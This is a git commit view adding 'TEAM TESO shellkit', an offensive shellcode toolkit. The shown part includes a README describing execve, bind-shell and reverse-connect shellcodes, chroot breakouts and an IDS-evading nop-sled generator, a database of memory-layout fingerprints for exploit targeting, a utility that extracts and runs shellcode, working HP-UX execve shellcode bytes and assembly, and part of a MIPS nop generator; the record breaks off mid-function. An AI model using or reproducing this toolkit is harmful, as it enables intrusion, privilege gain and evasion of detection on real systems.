summaryrefslogtreecommitdiff
path: root/other/shellkit
diff options
context:
space:
mode:
authorRoot THC2026-02-24 12:42:47 +0000
committerRoot THC2026-02-24 12:42:47 +0000
commitc9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
treeaefc355416b561111819de159ccbd86c3004cf88 /other/shellkit
parent073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
initial
Diffstat (limited to 'other/shellkit')
-rw-r--r--other/shellkit/Makefile24
-rw-r--r--other/shellkit/README187
-rw-r--r--other/shellkit/SYSTEMS134
-rw-r--r--other/shellkit/codedump.c93
-rw-r--r--other/shellkit/hppa.c12
-rw-r--r--other/shellkit/hppa.h7
-rw-r--r--other/shellkit/hppa.obin0 -> 8212 bytes
-rw-r--r--other/shellkit/hppa_hpux.c36
-rw-r--r--other/shellkit/hppa_hpux.h10
-rw-r--r--other/shellkit/hppa_hpux.obin0 -> 9000 bytes
-rw-r--r--other/shellkit/hppa_hpux/Makefile14
-rw-r--r--other/shellkit/hppa_hpux/build.sh57
-rw-r--r--other/shellkit/hppa_hpux/execvesh.s36
-rw-r--r--other/shellkit/hppa_hpux/execvesh.s-backup32
-rw-r--r--other/shellkit/mips.c143
-rw-r--r--other/shellkit/mips.h19
-rw-r--r--other/shellkit/mips.obin0 -> 13276 bytes
-rw-r--r--other/shellkit/mips_irix.c231
-rw-r--r--other/shellkit/mips_irix.h17
-rw-r--r--other/shellkit/mips_irix.obin0 -> 13984 bytes
-rw-r--r--other/shellkit/mips_irix/Makefile22
-rw-r--r--other/shellkit/mips_irix/README25
-rw-r--r--other/shellkit/mips_irix/chmod.s49
-rw-r--r--other/shellkit/mips_irix/chroot.s60
-rw-r--r--other/shellkit/mips_irix/connectsh.s109
-rw-r--r--other/shellkit/mips_irix/execvesh.s36
-rw-r--r--other/shellkit/mips_irix/exit.s29
-rw-r--r--other/shellkit/mips_irix/portshellsh.s126
-rw-r--r--other/shellkit/mips_irix/read.s51
-rw-r--r--other/shellkit/mips_irix/setgid.s30
-rw-r--r--other/shellkit/mips_irix/setreuid.s32
-rw-r--r--other/shellkit/shellcode.c61
-rw-r--r--other/shellkit/shellcode.h62
-rw-r--r--other/shellkit/shellcode.obin0 -> 11192 bytes
-rw-r--r--other/shellkit/shellkitbin0 -> 122697 bytes
-rw-r--r--other/shellkit/shellkit.c123
-rw-r--r--other/shellkit/shellkit.h31
-rw-r--r--other/shellkit/sparc.c140
-rw-r--r--other/shellkit/sparc.h10
-rw-r--r--other/shellkit/sparc.obin0 -> 13216 bytes
-rw-r--r--other/shellkit/sparc_solaris.c58
-rw-r--r--other/shellkit/sparc_solaris.h6
-rw-r--r--other/shellkit/sparc_solaris.obin0 -> 9628 bytes
-rw-r--r--other/shellkit/sparc_solaris/AUTHORS2
-rw-r--r--other/shellkit/sparc_solaris/NOTES11
-rw-r--r--other/shellkit/sparc_solaris/execve.s20
-rw-r--r--other/shellkit/sparc_solaris/exit.s10
-rw-r--r--other/shellkit/sparc_solaris/setgid.s12
-rw-r--r--other/shellkit/sparc_solaris/setreuid.s14
-rw-r--r--other/shellkit/splocoderbin0 -> 16519 bytes
-rw-r--r--other/shellkit/splocoder.c184
-rw-r--r--other/shellkit/tmp/hpux-tools.tar.gzbin0 -> 2550 bytes
-rw-r--r--other/shellkit/tmp/hpux-tools/Makefile5
-rw-r--r--other/shellkit/tmp/hpux-tools/README10
-rw-r--r--other/shellkit/tmp/hpux-tools/sample-one/Makefile10
-rw-r--r--other/shellkit/tmp/hpux-tools/sample-one/README5
-rw-r--r--other/shellkit/tmp/hpux-tools/sample-one/exploit.c123
-rw-r--r--other/shellkit/tmp/hpux-tools/sample-one/vuln.c34
-rw-r--r--other/shellkit/tmp/hpux-tools/shell-one.s39
-rw-r--r--other/shellkit/tmp/hpux-tools/shell-tree.s31
-rw-r--r--other/shellkit/tmp/hpux-tools/shell-two.s41
-rw-r--r--other/shellkit/tmp/hpux_bof.pdfbin0 -> 243787 bytes
-rw-r--r--other/shellkit/x86.c124
-rw-r--r--other/shellkit/x86.h21
-rw-r--r--other/shellkit/x86.obin0 -> 12280 bytes
-rw-r--r--other/shellkit/x86_bsd.c73
-rw-r--r--other/shellkit/x86_bsd.h12
-rw-r--r--other/shellkit/x86_bsd.obin0 -> 9768 bytes
-rw-r--r--other/shellkit/x86_bsd/FIXME_chmod.s43
-rw-r--r--other/shellkit/x86_bsd/bindshell.s59
-rw-r--r--other/shellkit/x86_bsd/connectshbin0 -> 6100 bytes
-rw-r--r--other/shellkit/x86_bsd/connectsh.s51
-rw-r--r--other/shellkit/x86_bsd/execveshbin0 -> 6034 bytes
-rw-r--r--other/shellkit/x86_bsd/execvesh.s31
-rw-r--r--other/shellkit/x86_bsd/exit.s18
-rw-r--r--other/shellkit/x86_bsd/spset.s36
-rw-r--r--other/shellkit/x86_linux.c352
-rw-r--r--other/shellkit/x86_linux.h32
-rw-r--r--other/shellkit/x86_linux.obin0 -> 20216 bytes
-rw-r--r--other/shellkit/x86_linux/AUTHORS5
-rw-r--r--other/shellkit/x86_linux/chmod.s23
-rw-r--r--other/shellkit/x86_linux/chroot.s34
-rw-r--r--other/shellkit/x86_linux/codedumpbin0 -> 6244 bytes
-rw-r--r--other/shellkit/x86_linux/connect.s61
-rw-r--r--other/shellkit/x86_linux/execvebin0 -> 5988 bytes
-rw-r--r--other/shellkit/x86_linux/execve.s22
-rw-r--r--other/shellkit/x86_linux/exit.s14
-rw-r--r--other/shellkit/x86_linux/portshell.s73
-rw-r--r--other/shellkit/x86_linux/portshell_slice.s77
-rw-r--r--other/shellkit/x86_linux/read.s22
-rw-r--r--other/shellkit/x86_linux/setgid.s14
-rw-r--r--other/shellkit/x86_linux/setreuid.s16
-rw-r--r--other/shellkit/x86_linux/setuid.s14
-rw-r--r--other/shellkit/x86_linux/spset.s36
-rw-r--r--other/shellkit/x86_linux/xor.s24
-rw-r--r--other/shellkit/x86_noptest.c25
-rw-r--r--other/shellkit/x86_solaris/README7
-rw-r--r--other/shellkit/x86_solaris/bindshell.s68
-rw-r--r--other/shellkit/x86_solaris/connectsh.s60
-rw-r--r--other/shellkit/x86_solaris/execve.s32
-rw-r--r--other/shellkit/x86_solaris/exit.s24
101 files changed, 4166 insertions, 0 deletions
diff --git a/other/shellkit/Makefile b/other/shellkit/Makefile
new file mode 100644
index 0000000..ff69bd9
--- /dev/null
+++ b/other/shellkit/Makefile
@@ -0,0 +1,24 @@
1
2#DFLAGS=-O2
3DFLAGS=-g -ggdb
4CC=gcc
5CFLAGS=$(DFLAGS) -Wall
6OBJS= shellcode.o \
7 hppa.o hppa_hpux.o \
8 mips.o mips_irix.o \
9 sparc.o sparc_solaris.o \
10 x86.o x86_bsd.o x86_linux.o \
11
12all: shellkit splocoder
13
14clean:
15 rm -f *.o shellkit
16 rm -f splocoder
17
18shellkit: $(OBJS)
19 $(CC) $(CFLAGS) -o shellkit shellkit.c $(OBJS)
20
21splocoder: splocoder.c
22 $(CC) $(CFLAGS) -o splocoder splocoder.c
23
24
diff --git a/other/shellkit/README b/other/shellkit/README
new file mode 100644
index 0000000..1c8b252
--- /dev/null
+++ b/other/shellkit/README
@@ -0,0 +1,187 @@
1
2TEAM TESO shellkit - your complete shellcode toolkit
3====================================================
4preliminary README file
5
6
7Conditions and rules to be obeyed by the shellcodes
8===================================================
9
10To construct generic shellcodes one has to state the exact details and
11requirements of each shellcode. The list below is what every shellcode within
12the shellkit has to obey.
13
14Conditions the shellcode encounters:
15
16 - Shellcode memory itself is writeable
17 - No register being properly set except the stack pointer
18
19Requirements to the shellcode:
20
21 - Do not contain NUL (0x00), line-termination (0x0a, 0x0d) and
22 format-directive (0x25 = '%') bytes
23 - Do not expect to be terminated by a NUL ('\0') character
24 - Working on heap and stack (i.e. any writeable and executeable memory)
25
26Suggestions (i.e. should be ...):
27
28 - Well tested on most common systems to be expected on the
29 architecture the shellcode runs on (i.e Solaris 2.[5678] on sparc,
30 IRIX 5.3, 6.[2345] on mips)
31 - Optimized for (in order of importance): stability, size
32
33
34Types of shellcodes to create
35=============================
36
37This is a UNIX listing, since most shellcodes are not doable on Windows, so
38this listing is for Unix derivates only. For the "configureable" values of the
39shellcodes there are setup functions to set the values within the shellcode.
40
41The listing is split into three different categories: chainables, local and
42remote. The chainable codes work as stubs to prepend other shellcodes with.
43This is done change certain settings in the environment, such as getting rid of
44chroot, certain uid's and the like. The local shellcodes are for use in locally
45exploitable vulnerabilities, while the remote shellcodes are designed to assist
46you with remote exploitation over the network.
47
48
49Chainables (6 codes)
50--------------------
51Chainable shellcodes should not influence the processing of the following
52shellcode in violation to the condition above.
53
54 - chrootbreak, which breaks out of a chroot environment if possible on that
55 architecture (using the best and most promising method)
56 - read(fd, behind-myself, len), which reads len bytes from fd behind itself
57 and executes them. on certain architectures special considerations for
58 cache problems have to be obeyed
59 - setreuid(?,?), which sets the (e)uid to a configureable value
60 - setgid(?), which sets the gid to a configurable value
61 - spset, which sets the stackpointer before the shellcode
62
63 - nop shellcode (see below for description)
64
65The "nop shellcode" is actually a function that will create a variadic amount
66of nop space which is not just one opcode but a mix. This is done to evade IDS
67systems. The generated nop-code should behave the same way a normal chainable
68shellcode would (i.e. not violating the conditions of the shellcode).
69
70
71Local (2 codes)
72---------------
73 - chmod/chown/exit, which chowns and chmods a pathname of your choice, then
74 exits
75 - execve-sh, which executes a /bin/sh
76 - exit, which will just exit with an undetermined exit code
77
78
79Remote (2 codes)
80----------------
81 - portshell-sh, which listens on a defineable port and executes a /bin/sh
82 once a connection is experienced
83 - connect-sh, which connects to a defineable ip and port and executes a
84 /bin/sh once it is connected
85
86
87Architectures
88=============
89
90arch os person(s)
91------- --------------- -----------------------------------------
92HPPA HP-UX caddis
93MIPS IRIX scut
94RS6000 AIX edi
95SPARC Solaris caddis, skyper
96x86 Solaris plasmoid
97x86 Windows NT halvar
98x86 Linux lorian, smiler
99x86 *BSD dvorak, smiler
100------- --------------- -----------------------------------------
101
102
103Developing
104==========
105
106Please include all custom build utilities, Makefiles (!) and maybe specific
107README files in the appropiate directory, so other people can join the fun or
108modify the codes at source level.
109
110
111Testing
112=======
113
114The shellcodes have to be tested thoroughly and on as much different systems as
115possible.
116
117
118Naming
119======
120
121Code Strings
122
123 <arch>-<os>-<code>
124
125arch is one of:
126
127 hppa
128 mips
129 rs6000
130 sparc
131 x86
132
133os is one of:
134
135 aix
136 bsd
137 hpux
138 irix
139 linux
140 solaris
141 windowsnt
142
143code is one of:
144
145 chmod
146 chroot
147 connectsh
148 execvesh
149 exit
150 portshellsh
151 read
152 setreuid
153 setgid
154 spset
155
156Example: The portshell shellcode for the MIPS architecture under the IRIX
157 operating system would be identified with "mips-irix-portshellsh"
158
159
160Additional information
161======================
162
163Please use the included 'splocoder' utility to dump important system
164information of the various architectures. There will be a documentation of what
165the fields mean and how they can be used. Soon.
166
167
168Credits
169=======
170
171This shellcode toolkit is the result of the hard work of numerous persons, here
172is a list of the persons involved.
173
174XXX/TODO: update, add missing persons
175
176 acpizer - splocoder
177 lorian - x86 linux/bsd codes
178 palmers - x86 linux codes
179 scut - mips irix, hppa hpux codes, framework and docs
180 smiler - x86 bsd codes
181 stealth - x86 bsd codes
182
183
184==
185vi:fo=tcrq:tw=79:
186
187
diff --git a/other/shellkit/SYSTEMS b/other/shellkit/SYSTEMS
new file mode 100644
index 0000000..33f09af
--- /dev/null
+++ b/other/shellkit/SYSTEMS
@@ -0,0 +1,134 @@
1# splocoder output database -- team teso
2# add your system here
3#
4# thanks to all the people who send me in fingerprints, you know who you are
5# :-)
6
7# BSD systems
8FreeBSD-4.2-RELEASE-i386 le stackdown 4 4
9 data bss stack env 08049a70 08049c80 bfbffa60 bfbffb64
10 M: zero neg big small tiny 0804c030 00000000 0804d000 0814d000 0804c040
11
12FreeBSD-4.3-RC-i386 le stackdown 4 4
13 data bss stack env 08049a70 08049c80 bfbffa78 bfbffb7c
14 M: zero neg big small tiny 0804c030 00000000 0804d000 0814d000 0804c040
15
16FreeBSD-4.3-RELEASE-i386 le stackdown 4 4
17 data bss stack env 08049a70 08049c80 bfbffba0 bfbffca4
18 M: zero neg big small tiny 0804c030 00000000 0804d000 0814d000 0804c040
19
20NetBSD-1.5-i386 le stackdown 4 4
21 data bss stack env 08049dd8 08049fe0 bfbfd614 bfbfdb6c
22 M: zero neg big small tiny 0805c030 00000000 0805d000 0815d000 0805c040
23
24OpenBSD-2.6-i386 le stackdown 4 4
25 data bss stack env 000030e8 0000313c dfbfd958 dfbfdeac
26 M: zero neg big small tiny 00015030 00000000 00016000 00116000 00015040
27
28OpenBSD-2.8-alpha le stackdown 4 8
29 data bss stack env 12001d0d5 12001dff8 1fffff810 1fffff890
30 M: zero neg big small tiny 120026060 00000000 120028000 120128000 120026070
31
32OpenBSD-2.8-i386 le stackdown 4 4
33 data bss stack env 000030ec 00003148 dfbfd658 dfbfdbac
34 M: zero neg big small tiny 00015030 00000000 00016000 00116000 00015040
35
36OpenBSD-2.9-i386 le stackdown 4 4
37 data bss stack env 000030ec 00003148 dfbfd3dc dfbfd930
38 M: zero neg big small tiny 00007030 00000000 00008000 00108000 00007040
39
40OpenBSD-2.9-sparc be stackdown 4 4
41 data bss stack env 00004110 00004178 f7fff5d8 f7fffb4c
42 M: zero neg big small tiny 00016030 00000000 00017000 00117000 00016040
43
44# HPUX systems
45HP-UX-B.10.20-9000/715 be stackup 4 4
46 data bss stack env 400010c0 40001188 7b03a530 7b03a3ac
47 M: zero neg big small tiny 400031e0 00000000 400031e8 401031f0 40103260
48
49HP-UX-B.10.20-9000/735 be stackup 4 4
50 data bss stack env 400010c0 40001188 7b03a590 7b03a414
51 M: zero neg big small tiny 400031e0 00000000 400031e8 401031f0 40103260
52
53# IRIX systems
54IRIX-6.5-IP20 be stackdown 4 4
55 data bss stack env 100132f8 10013410 7fff2f00 7fff2f6c
56 M: zero neg big small tiny 10014010 10014020 10014090 10114098 10014030
57
58IRIX64-6.5-IP27 be stackdown 4 4
59 data bss stack env 100140f8 100141c0 7ffe3e70 7ffe3f1c
60 M: zero neg big small tiny 10015010 10015020 10015090 10115098 10015030
61
62# Linux systems
63Linux-2.2.13-i486 le stackdown 4 4
64 data bss stack env 080499f0 08049b20 bffff7a8 bffff98c
65 M: zero neg big small tiny 08049b90 00000000 40117008 08049ba0 08049c08
66
67Linux-2.2.19-i586 le stackdown 4 4
68 data bss stack env 08049a10 08049b40 bffff3e8 bffff5cc
69 M: zero neg big small tiny 08049d40 00000000 00227008 08049d50 08049db8
70
71Linux-2.2.1-mips le stackdown 4 4
72 data bss stack env 10000020 100000d4 7ffffb10 7ffffbdc
73 M: zero neg big small tiny 10000150 00000000 2ac2d008 10000160 100001c8
74
75Linux-2.2.19pre17-i686 le stackdown 4 4
76 data bss stack env 080499d0 08049ae0 bffffbac bffffdac
77 M: zero neg big small tiny 08049b50 00000000 400f3008 08049b60 08049bc8
78
79Linux-2.2.19-sparc64 be stackdown 4 4
80 data bss stack env 00021ef0 000220e4 effffb68 effffdcc
81 M: zero neg big small tiny 00022138 00000000 7012e008 00022148 000221b0
82
83Linux-2.4.6-i686 le stackdown 4 4
84 data bss stack env 08049d50 08049e60 bffff9ac bffffbac
85 M: zero neg big small tiny 08049ed0 00000000 40142008 08049ee0 08049f48
86
87Linux-2.4.7-4GB-i686 le stackdown 4 4
88 data bss stack env 08049a4c 08049b60 bfffefac bffff1ac
89 M: zero neg big small tiny 08049bd0 00000000 40143008 08049be0 08049c48
90
91Linux-2.4.4-ppc be stackdown 4 4
92 data bss stack env 10010fa8 1001107c 7ffff9d8 7ffffa8c
93 M: zero neg big small tiny 100111a8 00000000 30028008 100111b8 10011220
94
95Linux-2.4.8-sparc64 be stackdown 4 4
96 data bss stack env 00021ef0 00022100 effff868 effffacc
97 M: zero neg big small tiny 00022150 00000000 70170008
98
99# alpha
100OSF1-V5.0-alpha le stackdown 4 8
101 data bss stack env 1400001b8 140000300 11fffbf50 11fffc028
102 M: zero neg big small tiny 00000000 00000000 140004000 140002100 140002180
103
104# Solaris systems
105SunOS-5.6-sun4u be stackdown 4 4
106 data bss stack env 00021284 00021470 effff5da effffb54
107 M: zero neg big small tiny 00021488 00000000 00021888 00121890 00021498
108
109SunOS-5.7-sun4u be stackdown 4 4
110 data bss stack env 00021190 00021350 ffbef3a0 ffbef92c
111 M: zero neg big small tiny 00021368 00000000 00021768 00121770 00021378
112
113SunOS-5.8-sun4d be stackdown 4 4
114 data bss stack env 00020d10 00021008 dffff3e0 dffff9dc
115 M: zero neg big small tiny 00021060 00000000 00021460 00121468 00021070
116
117SunOS-5.8-sun4m be stackdown 4 4
118 data bss stack env 00021180 00021340 effff808 effffd94
119 M: zero neg big small tiny 00021358 00021368 00021758 00121760 00021378
120
121SunOS-5.8-sun4u be stackdown 4 4
122 data bss stack env 00020d00 00020ff4 ffbeefe8 ffbef5e4
123 M: zero neg big small tiny 00021050 00021060 00021450 00121458 00021070
124
125# exotics
126CYGWIN_NT-4.0-1.1.6(0.30/3/2) le stackdown 4 4
127 data bss stack env 00402004 0040305c 0240fe34 0a010008
128 M: zero neg big small tiny 0a0104c0 0a0104d0 0a0104e0 0a1104e8 0a110550
129
130CYGWIN_NT-5.0-1.3.3s(0.44/3/2) le stackdown 4 4
131 data bss stack env 00402004 0040305c 0240fe34 0a010008
132 M: zero neg big small tiny 0a0104b8 0a0104c8 0a0104d8 0a1104e0 0a110548
133
134
diff --git a/other/shellkit/codedump.c b/other/shellkit/codedump.c
new file mode 100644
index 0000000..9494b9e
--- /dev/null
+++ b/other/shellkit/codedump.c
@@ -0,0 +1,93 @@
1/* shellcode extraction utility,
2 * by type / teso, small mods by scut.
3 */
4
5
6#include <stdio.h>
7#include <stdlib.h>
8#include <ctype.h>
9
10#ifdef IRIX
11#include <sys/cachectl.h>
12#endif
13
14#ifdef HPUX
15extern char * cbegin;
16extern char * cend;
17#else
18extern void cbegin ();
19extern void cend ();
20#endif
21
22typedef void (* fptr)(void);
23
24int
25bad (unsigned char u);
26
27
28int
29main (int argc, char *argv[])
30{
31 int i,
32 bbytes = 0;
33 unsigned char * buf = (unsigned char *) cbegin;
34
35 unsigned char ebuf[1024];
36 fptr ebuf_p = (fptr) &ebuf[0];
37
38
39 fprintf (stderr, "/* %lu byte shellcode */\n",
40 (unsigned long int) cend - (unsigned long int) cbegin);
41
42 for (i = 0 ; buf < (unsigned char *) cend; ++buf) {
43 if (i % 12 == 0 && buf > (unsigned char *) cbegin)
44 printf ("\n");
45 if (i % 12 == 0)
46 printf ("\"");
47
48 if (bad (*buf & 0xff)) {
49 printf ("_\\x%02x_", *buf & 0xff);
50 bbytes += 1;
51 } else {
52 printf ("\\x%02x", *buf & 0xff);
53 }
54
55 if (++i >= 12) {
56 i = 0;
57 printf ("\"");
58 }
59 }
60 if (i % 12 == 0)
61 printf (";\n");
62 else
63 printf ("\";\n");
64
65 printf("\n");
66
67 fprintf (stderr, "bad bytes = %d\n", bbytes);
68
69 if (argc > 1) {
70 memcpy (ebuf, cbegin, (unsigned long int) cend -
71 (unsigned long int) cbegin);
72#ifdef IRIX
73 memcpy (ebuf + ((unsigned long int) cend -
74 (unsigned long int) cbegin), "/bin/sh\x42_ABCDEFGHIJKLMNOPQRSTUVWXYZ", 40);
75 cacheflush (ebuf, sizeof (ebuf), BCACHE);
76#endif
77 ebuf_p ();
78 }
79
80 exit (EXIT_SUCCESS);
81}
82
83
84int
85bad (unsigned char u)
86{
87 if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25')
88 return (1);
89
90 return (0);
91}
92
93
diff --git a/other/shellkit/hppa.c b/other/shellkit/hppa.c
new file mode 100644
index 0000000..462b017
--- /dev/null
+++ b/other/shellkit/hppa.c
@@ -0,0 +1,12 @@
1/* hppa.c - generic pa-risc functions
2 *
3 * by team teso
4 */
5
6#include <stdio.h>
7#include <stdlib.h>
8#include "shellcode.h"
9#include "hppa.h"
10
11
12
diff --git a/other/shellkit/hppa.h b/other/shellkit/hppa.h
new file mode 100644
index 0000000..f325a5f
--- /dev/null
+++ b/other/shellkit/hppa.h
@@ -0,0 +1,7 @@
1
2#ifndef HPPA_H
3#define HPPA_H
4
5
6#endif
7
diff --git a/other/shellkit/hppa.o b/other/shellkit/hppa.o
new file mode 100644
index 0000000..e54e3fe
--- /dev/null
+++ b/other/shellkit/hppa.o
Binary files differ
diff --git a/other/shellkit/hppa_hpux.c b/other/shellkit/hppa_hpux.c
new file mode 100644
index 0000000..815fdaf
--- /dev/null
+++ b/other/shellkit/hppa_hpux.c
@@ -0,0 +1,36 @@
1
2#include <stdio.h>
3#include <stdlib.h>
4#include <string.h>
5#include "shellcode.h"
6#include "hppa.h"
7
8
9/* tested on: HP-UX B.10.20 A 9000/735
10 * lsd people used execv, we use execve, which enlarges our code by 12
11 * bytes
12 */
13shellcode hppa_hpux_execvesh = {
14 "hppa-hpux-execvesh",
15 48,
16 "\xeb\x5f\x1f\xfd\xb4\x16\x70\x76\xb7\x5a\x40\x3a"
17 "\x0f\xc0\x12\x88\x0f\xda\x12\x80\x0b\xc0\x02\x99"
18 "\x0b\x18\x02\x98\x22\xa0\x08\x01\xe6\xa0\xe0\x08"
19 "\x0f\x40\x12\x0e\x2f\x62\x69\x6e\x2f\x73\x68\x41",
20};
21
22
23shellcode * hppa_hpux_shellcodes[] = {
24 &hppa_hpux_execvesh,
25 NULL,
26};
27
28arch hppa_hpux = {
29 "hppa-hpux",
30 4,
31 NULL /* hppa_nop */,
32 hppa_hpux_shellcodes,
33};
34
35
36
diff --git a/other/shellkit/hppa_hpux.h b/other/shellkit/hppa_hpux.h
new file mode 100644
index 0000000..0b53da2
--- /dev/null
+++ b/other/shellkit/hppa_hpux.h
@@ -0,0 +1,10 @@
1
2#ifndef HPPA_HPUX_H
3#define HPPA_HPUX_H
4
5#include "shellcode.h"
6
7arch hppa_hpux;
8
9#endif
10
diff --git a/other/shellkit/hppa_hpux.o b/other/shellkit/hppa_hpux.o
new file mode 100644
index 0000000..28141b6
--- /dev/null
+++ b/other/shellkit/hppa_hpux.o
Binary files differ
diff --git a/other/shellkit/hppa_hpux/Makefile b/other/shellkit/hppa_hpux/Makefile
new file mode 100644
index 0000000..41621dd
--- /dev/null
+++ b/other/shellkit/hppa_hpux/Makefile
@@ -0,0 +1,14 @@
1
2#DFLAGS=-O2
3DFLAGS=-g -ggdb
4CC=gcc
5CFLAGS=$(DFLAGS) -Wall
6
7all:
8 $(CC) $(CFLAGS) -o execvesh execvesh.s
9
10clean:
11 rm -f *.o
12 rm -f chmod chroot connectsh execvesh exit portshellsh read \
13 setgid setreuid
14
diff --git a/other/shellkit/hppa_hpux/build.sh b/other/shellkit/hppa_hpux/build.sh
new file mode 100644
index 0000000..5a77f25
--- /dev/null
+++ b/other/shellkit/hppa_hpux/build.sh
@@ -0,0 +1,57 @@
1#!/bin/sh
2
3#c89 -c -o object.o $1
4#objdump -D cbegin $1 | egrep "[0-9a-f]+:" | cut -c 7- | \
5# awk '{ printf ("\t\"\\x%s\\x%s\\x%s\\x%s\"\t/* %s\t*/\n", \
6# $1, $2, $3, $4, $5 $6 $7 $8 $9) }' > \
7# object.h
8#gcc -o $2 ../codedump.c -DHPUX
9#rm -f object.h
10
11# i knew learning awk would repay some day ;-P
12objdump -D execvesh | \
13awk '
14 function pbyte (CHAR) {
15 if (match (CHAR, /(00)|(0a)|(0d)|(25)/))
16 printf ("_");
17 printf ("\\x%s", CHAR);
18 if (match (CHAR, /(00)|(0a)|(0d)|(25)/))
19 printf ("_");
20 return;
21 }
22
23 BEGIN {
24 foo = 0;
25 }
26
27 /cbegin/ {
28 foo = 1;
29 ccount = 0;
30 printf ("unsigned char shellcode[] =");
31 }
32
33 foo == 1 && /cend/ {
34 foo = 0;
35 if (ccount == 0) {
36 printf (";\n");
37 } else {
38 printf ("\";\n");
39 }
40 }
41
42 foo == 1 && /[0123456789abcdef]+\:/ {
43 if (ccount == 0) {
44 printf ("\n\t\"");
45 }
46 pbyte($2);
47 pbyte($3);
48 pbyte($4);
49 pbyte($5);
50 ccount += 4;
51
52 if (ccount == 12) {
53 ccount = 0;
54 printf ("\"")
55 }
56 }'
57
diff --git a/other/shellkit/hppa_hpux/execvesh.s b/other/shellkit/hppa_hpux/execvesh.s
new file mode 100644
index 0000000..49b1b33
--- /dev/null
+++ b/other/shellkit/hppa_hpux/execvesh.s
@@ -0,0 +1,36 @@
1
2 .LEVEL 1.1
3
4 .SPACE $TEXT$
5 .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
6
7 .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
8main
9 bl cbegin, %r1
10 nop
11
12 .align 4
13
14 .SUBSPA $DATA$
15 .EXPORT cbegin
16
17cbegin
18 bl moo,%r26
19moo
20 addi,> 0x3b,%r0,%r22
21 addi,< 0x1d,%r26,%r26
22 stw %r0,4(%sp)
23 stw %r26,0(%sp)
24 xor %r0,%sp,%r25
25 xor %r24,%r24,%r24
26
27 ldil L%0xc0000004,%r21
28 ble R%0xc0000004(%sr7,%r21)
29 stbs %r0,7(%r26)
30
31 .STRING "/bin/sh\x41"
32
33 .EXPORT cend
34cend
35 nop
36
diff --git a/other/shellkit/hppa_hpux/execvesh.s-backup b/other/shellkit/hppa_hpux/execvesh.s-backup
new file mode 100644
index 0000000..c2d3559
--- /dev/null
+++ b/other/shellkit/hppa_hpux/execvesh.s-backup
@@ -0,0 +1,32 @@
1
2 .LEVEL 1.1
3
4 .SPACE $TEXT$
5
6 .align 4
7 .EXPORT cbegin,PRIV_LEV=3,ARGW0=GR,ARGW1=GR,RTNVAL=GR
8
9cbegin
10 .PROC
11 .CALLINFO FRAME=128,CALLS,SAVE_RP,SAVE_SP,ENTRY_GR=3
12
13 bl moo,%r26
14moo
15 xor %r25,%r25,%r25
16 addi,< 0x11,%r26,%r26
17 stbs %r0,7(%r26)
18 ldil L%0xc0000004,%r21
19 ble R%0xc0000004(%sr7,%r21)
20 ldo 0xb(%r0),%r22
21
22 .STRING "/bin/sh\x41"
23
24 .PROCEND
25
26
27 .EXPORT cend,PRIV_LEV=3,ARGW0=GR,ARGW1=GR,RTNVAL=GR
28cend
29 .PROC
30 .CALLINFO FRAME=128,CALLS,SAVE_RP,SAVE_SP,ENTRY_GR=3
31
32 .PROCEND
diff --git a/other/shellkit/mips.c b/other/shellkit/mips.c
new file mode 100644
index 0000000..dda3f92
--- /dev/null
+++ b/other/shellkit/mips.c
@@ -0,0 +1,143 @@
1/* mips.c - generic mips functions
2 *
3 * by team teso
4 */
5
6#include <stdio.h>
7#include <stdlib.h>
8#include "shellcode.h"
9#include "mips.h"
10
11static unsigned long int mips_nop_rwreg (void);
12static unsigned long int mips_nop_roreg (void);
13static unsigned long int mips_nop_xfer (char *xferstr);
14
15/* mips generic isa "nop" space generator
16 */
17
18/* get random read write register (i.e. not sp, everything else allowed)
19 */
20static unsigned long int
21mips_nop_rwreg (void)
22{
23 unsigned long int reg;
24
25 do {
26 reg = random_get (0, 31);
27 } while (reg == 29); /* 29 = $sp */
28
29 return (reg);
30}
31
32
33static unsigned long int
34mips_nop_roreg (void)
35{
36 return (random_get (0, 31));
37}
38
39
40static unsigned long int
41mips_nop_xfer (char *xferstr)
42{
43 int bw = 0; /* bitfield walker */
44 unsigned long int tgt; /* resulting instruction */
45
46 /* in a valid xferstr we trust */
47 for (tgt = 0 ; xferstr != NULL && xferstr[0] != '\0' ; ++xferstr) {
48 switch (xferstr[0]) {
49 case ('0'):
50 BSET (tgt, 1, 0, bw);
51 break;
52 case ('1'):
53 BSET (tgt, 1, 1, bw);
54 break;
55 case ('r'):
56 BSET (tgt, 5, mips_nop_roreg (), bw);
57 break;
58 case ('w'):
59 BSET (tgt, 5, mips_nop_rwreg (), bw);
60 break;
61 case ('c'):
62 BSET (tgt, 16, random_get (0, 0xffff), bw);
63 break;
64 case ('.'):
65 break; /* ignore */
66 default:
67 fprintf (stderr, "on steroids, huh?\n");
68 exit (EXIT_FAILURE);
69 break;
70 }
71 }
72
73 if (bw != 32) {
74 fprintf (stderr, "invalid bitwalker: bw = %d\n", bw);
75 exit (EXIT_FAILURE);
76 }
77
78 return (tgt);
79}
80
81
82unsigned int
83mips_nop (unsigned char *dest, unsigned int dest_len,
84 unsigned char *bad, int bad_len)
85{
86 int walk;
87 int bcount; /* bad counter */
88 char * xs;
89 char * xferstr[] = {
90 "000000.r.r.w.00000.000100", /* sllv rs rt rd */
91 "000000.r.r.w.00000.000110", /* srlv rs rt rd */
92 "000000.r.r.w.00000.000111", /* srav rs rt rd */
93 "000000.r.r.w.00000.100001", /* addu rs rt rd */
94 "000000.r.r.w.00000.100011", /* subu rs rt rd */
95 "000000.r.r.w.00000.100100", /* and rs rt rd */
96 "000000.r.r.w.00000.100101", /* or rs rt rd */
97 "000000.r.r.w.00000.100110", /* xor rs rt rd */
98 "000000.r.r.w.00000.100111", /* nor rs rt rd */
99 "000000.r.r.w.00000.101010", /* slt rs rt rd */
100 "000000.r.r.w.00000.101011", /* sltu rs rt rd */
101 "001001.r.w.c", /* addiu rs rd const */
102 "001010.r.w.c", /* slti rs rd const */
103 "001011.r.w.c", /* sltiu rs rd const */
104 "001100.r.w.c", /* andi rs rd const */
105 "001101.r.w.c", /* ori rs rd const */
106 "001110.r.w.c", /* xori rs rd const */
107 "001111.00000.w.c", /* lui rd const */
108 NULL,
109 };
110 unsigned long int tgt;
111
112 if (dest_len % 4) {
113 fprintf (stderr, "off by %d padding of dest_len (= %u), rounding down\n",
114 dest_len % 4, dest_len);
115 dest_len -= (dest_len % 4);
116 }
117
